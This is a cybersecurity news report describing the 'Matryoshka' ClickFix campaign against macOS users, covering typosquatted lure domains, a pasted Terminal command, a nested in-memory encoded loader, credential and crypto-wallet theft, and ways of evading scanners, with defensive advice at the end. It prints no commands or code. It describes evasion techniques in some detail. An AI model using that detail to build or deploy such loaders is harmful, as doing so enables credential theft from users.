Clickfix Matryoshka Variant Attacks Users with Attacking Deploy

macOS users face a new threat from a sophisticated social engineering campaign. This campaign distributes dangerous stealer malware by leveraging an evolved version of the ClickFix attack technique.

Named “Matryoshka” after the Russian nesting dolls, this variant uses nested obfuscation layers to hide malicious code from security scanners and automated analysis systems.

The attack tricks victims into executing Terminal commands that appear to be legitimate software fixes, bypassing traditional download-and-launch security expectations that many users rely on.​

The campaign leverages typosquatting domains to intercept users who mistype legitimate website addresses, particularly targeting visitors attempting to reach software review sites.

Once redirected to the fraudulent domain, victims encounter a fake installation prompt instructing them to paste a “fix” command into their macOS Terminal application.

Intego analysts identified this attack chain after observing typosquatted domains like comparisions[.]org, which mimics the legitimate comparisons.org website by adding an extra letter.

Unlike earlier ClickFix variants that used readable scripts, Matryoshka employs advanced evasion techniques designed to complicate detection efforts.

The malicious payload remains encoded and compressed until execution, exploding only in memory rather than writing clean script files to disk.

This approach significantly reduces visibility for file-based security scanning and makes basic static analysis more challenging for researchers.

After successful execution, the loader retrieves an AppleScript payload specifically designed to harvest browser credentials and target cryptocurrency wallet applications including Trezor Suite and Ledger Live.

The malware attempts programmatic credential theft first, then falls back to displaying fake system dialogs that repeatedly request passwords until victims comply.

Infection Mechanism and Evasion Tactics

The Matryoshka infection chain operates through multiple stages, each designed to evade detection while maintaining operational efficiency.

When victims paste the malicious Terminal command, it retrieves a shell script containing a large encoded payload hidden within a heredoc structure.

This payload passes through an in-memory pipeline where it undergoes decoding and decompression without creating easily detectable file artifacts.

The loader demonstrates several clever evasion behaviors that help it run unnoticed. It detaches its main routine to the background and exits quickly, making the Terminal prompt return almost immediately so victims believe the process has finished.

The script redirects standard input, output, and error streams to suppress visible artifacts in the terminal session.

Additionally, the command-and-control infrastructure requires specific custom headers in requests, responding with generic errors to automated scanners lacking proper credentials.

Users should never paste commands from websites into Terminal, as legitimate software updates will not require this action.

Organizations should block typosquatting domains, monitor Terminal-initiated execution patterns, and watch for suspicious staging archives or wallet application tampering.

Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.